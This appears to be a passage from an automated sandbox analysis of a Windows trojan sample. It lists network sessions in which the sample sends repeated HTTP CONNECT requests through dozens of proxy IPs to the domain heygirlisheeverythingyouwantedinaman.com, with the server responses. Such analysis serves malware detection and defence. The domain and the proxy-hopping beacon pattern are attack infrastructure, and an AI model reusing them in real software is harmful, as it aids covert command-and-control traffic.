                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                60192.168.2.85018334.135.166.24805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.669595957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.007215023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.350970984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.038570881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.413506985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882559061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.382546902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.195028067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.695019007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                61192.168.2.8501235.9.98.14231295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.725426912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                62192.168.2.850241185.238.228.202805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.725682974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.813129902 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                63192.168.2.850017146.190.84.20994455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.737020969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.397870064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.351001978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.382473946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.195107937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.992203951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.882664919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.494110107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:00.569736958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                64192.168.2.85019834.83.143.631285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.737163067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.074003935 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                65192.168.2.850128113.30.149.76805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.745953083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                66192.168.2.850193141.94.174.6334665828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.747318983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                67192.168.2.850029103.216.50.1180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.747672081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.096055984 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                68192.168.2.850254104.23.126.8805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.747673035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.834938049 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                69192.168.2.850139176.98.81.8580805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.747988939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                70192.168.2.850044123.30.154.17177775828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.760394096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.153949976 CET343INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.10.3 (Ubuntu)
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 182
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                71192.168.2.850291202.159.19.2134435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.778749943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                72192.168.2.850294202.159.19.2134435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.780725002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                73192.168.2.850232193.239.58.9280815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.787705898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                74192.168.2.85030549.51.93.2224435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.789096117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                75192.168.2.85030649.51.93.2224435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.790143967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                76192.168.2.85030749.51.93.2224435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.791709900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                77192.168.2.850175190.103.177.131805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.791915894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.151282072 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                78192.168.2.85030949.51.93.2224435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.793652058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                79192.168.2.85007336.95.102.11131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.810776949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.186983109 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                80192.168.2.850260107.181.161.8141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.839606047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                81192.168.2.85021920.219.177.7331295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.854573965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.145088911 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                82192.168.2.85014592.246.139.106333285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.858776093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.538466930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                83192.168.2.850173103.118.46.17680805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.888070107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.229726076 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                84192.168.2.850206139.129.162.6531285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.895117044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                85192.168.2.850203219.243.212.11884435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.921101093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.273170948 CET22INHTTP/1.1 502 ERROR


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                86192.168.2.850269167.99.39.82465235828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.923155069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.397854090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.929147005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.991691113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.179589033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382806063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.695039988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                87192.168.2.85005236.67.27.189495245828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.935504913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                88192.168.2.850359104.21.6.88805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.936068058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.024561882 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                89192.168.2.850361104.17.166.210805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
